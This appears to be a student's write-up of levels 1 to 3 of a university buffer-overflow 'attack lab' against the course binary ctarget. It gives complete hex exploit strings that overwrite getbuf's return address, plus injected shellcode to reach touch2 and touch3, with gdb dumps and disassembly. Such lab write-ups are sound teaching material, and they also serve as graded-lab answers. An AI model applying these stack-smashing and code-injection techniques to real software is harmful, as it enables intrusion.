* Level 1
You need to redirect the program to execute a procedure that already
exists.

~getbuf~ (the function that introduces the vulnerability by using
~get~) is called by ~test~:
#+begin_src c
  void test()
  {
      int val;
      val = getbuf();
      printf("No exploit. Getbuf returned 0x%x\n", val);
  }
#+end_src

The task consists in getting ~ctarget~ to execute ~touch1~ when
~getbuf~ executes its return statement (rather than returning to
~test~).

#+begin_src c
  void touch1()
  {
      vlevel = 1; /* Part of validation protocol */
      printf("Touch1!: You called touch1()\n");
      validate(1);
      exit(0);
  }
#+end_src

This is the address of touch1: ~00000000004017c0~.  Without looking at
the code further, I've started to add bytes of 0s in front of that
address and tried to whether it worked. After five attempts it
worked. (I've also sorted the bytes so that they are in little
endian.)

Solution:
#+begin_src
echo "00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 \
c0 17 40 00 00 00 00 00" | ./hex2raw | ./ctarget -q
#+end_src

(
to run gdb:
- dump the raw data into a file:
  #+begin_src shell
    echo "00 00 00 00 00 00 00 00 \
    00 00 00 00 00 00 00 00 \
    00 00 00 00 00 00 00 00 \
    00 00 00 00 00 00 00 00 \
    00 00 00 00 00 00 00 00 \
    c0 17 40 00 00 00 00 00" | ./hex2raw > raw_input
  #+end_src
- xecute ~gdb ./ctarget~
- set your initial breakpoints
- execute the command ~run -q < raw_input~
(See
https://stackoverflow.com/questions/455544/how-to-load-program-reading-stdin-and-taking-parameters-in-gdb)
)

Explanation: this is the assembly code for ~getbuf~:

#+begin_src asm
00000000004017a8 <getbuf>:
  4017a8:	48 83 ec 28          	sub    $0x28,%rsp
  4017ac:	48 89 e7             	mov    %rsp,%rdi
  4017af:	e8 8c 02 00 00       	call   401a40 <Gets>
  4017b4:	b8 01 00 00 00       	mov    $0x1,%eax
  4017b9:	48 83 c4 28          	add    $0x28,%rsp
  4017bd:	c3                   	ret
  4017be:	90                   	nop
  4017bf:	90                   	nop
#+end_src

As soon as execution enters ~getbuf~ (before executing ~sub
$0x28,%rsp~), ~%rsp~ points to --- that is, at the top of the stack
there is --- the address of the instruction which must be executed
when ~getbuf~ terminates (which happens to be ~0x0000000000401976~).
That is the value we need to change.

We can see that the first thing ~getbuf~ does is to allocate 40 bytes
in its stack frame (by decreasing the value of ~%rsp~ by 40).

Then ~gets~ is called. The first argument passed to ~gets~ is the
value of ~%rsp~. We can then reasonably guess that ~gets~ is going to
write the input it receives onto the stack, starting from its top
(lowest address).

Now if we pass to ~gets~ 40 bytes of zeros (or whatever values) + an
address of 8 bytes, then we should fill the whole 40 bytes allocated
by ~gets~ and overwrite ~0x0000000000401976~ with our new address.
* Level 2
One way to solve level 2 is to make the stack look like this right
before ~getbuf~ execute its ~ret~ instruction:
#+begin_src
(gdb) x/6gz $rsp
0x5561dca0:     0x000000005561dcb0      0x0000000000000000
0x5561dcb0:     0x4859b997fac7c748      0xc3004017ec2404c7
0x5561dcc0:     0xf4f4f4f4f4f4f400      0xf4f4f4f4f4f4f4f4
#+end_src

The top of the stack has been overwritten with the address of my
shellcode (~0x000000005561dcb0~).

This is the string I have passed to ~hex2raw~:
#+begin_src
00 00 00 00 00 00 00 00  /* 40 bytes of nothing */
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
b0 dc 61 55 00 00 00 00 /* address of payload */
00 00 00 00 00 00 00 00
48 c7 c7 fa 97 b9 59    /* payload */
48 c7 04 24 ec 17 40
00
c3

/* 48 c7 c7 fa 97 b9 59 	mov    $0x59b997fa,%rdi */
/* 48 c7 04 24 ec 17 40 	movq   $0x4017ec,(%rsp) */
/* 00 */
/* c3                   	ret */
#+end_src
* Level 3

First of all, let's compute the string representation of my cookie.

Our cookie is 0x59b997fa.

According to ascii:

'5' => 0x35

'9' => 0x39

'b' => 0x62

'7' => 0x37

'f' => 0x66

'a' => 0x61

So, the string representation of our cookie should be:

5  9  b  9  9  7  f  a
|  |  |  |  |  |  |  |
v  v  v  v  v  v  v  v
35 39 62 39 39 37 66 61

In little endian:

61 66 37 39 39 62 39 35

Exploit:
#+begin_src
00 00 00 00 00 00 00 00  /* 40 bytes of nothing */
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
b0 dc 61 55 00 00 00 00 /* address of payload */
00 00 00 00 00 00 00 00
/* payload: */
c7 84 24 8c 00 00 00
35 39 62 39
c7 84 24 90 00 00 00
39 37 66 61
48 c7 84 24 94 00 00
00 00 00 00 00
48 8d bc 24 8c 00 00
00
48 83 ec 08
48 c7 04 24 fa 18 40
00
c3

/*
movl $0x39623935, 140(%rsp) # half stringified cookie
movl $0x61663739, 144(%rsp) # half stringified cookie
movq $0, 148(%rsp)  # pass pointer to stringified cookie to touch3
leaq 140(%rsp), %rdi
subq $0x8, %rsp
movq $0x004018fa, (%rsp) # address of touch3
ret
*/
#+end_src
